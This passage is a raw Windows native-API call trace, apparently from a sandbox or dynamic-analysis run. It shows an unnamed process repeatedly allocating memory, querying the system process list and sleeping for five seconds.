NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.530] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.544] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.563] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.576] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.592] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.607] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.624] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.641] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.654] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.671] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.686] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.702] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.717] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.732] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.749] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.765] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.780] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.794] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.811] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.826] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.842] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 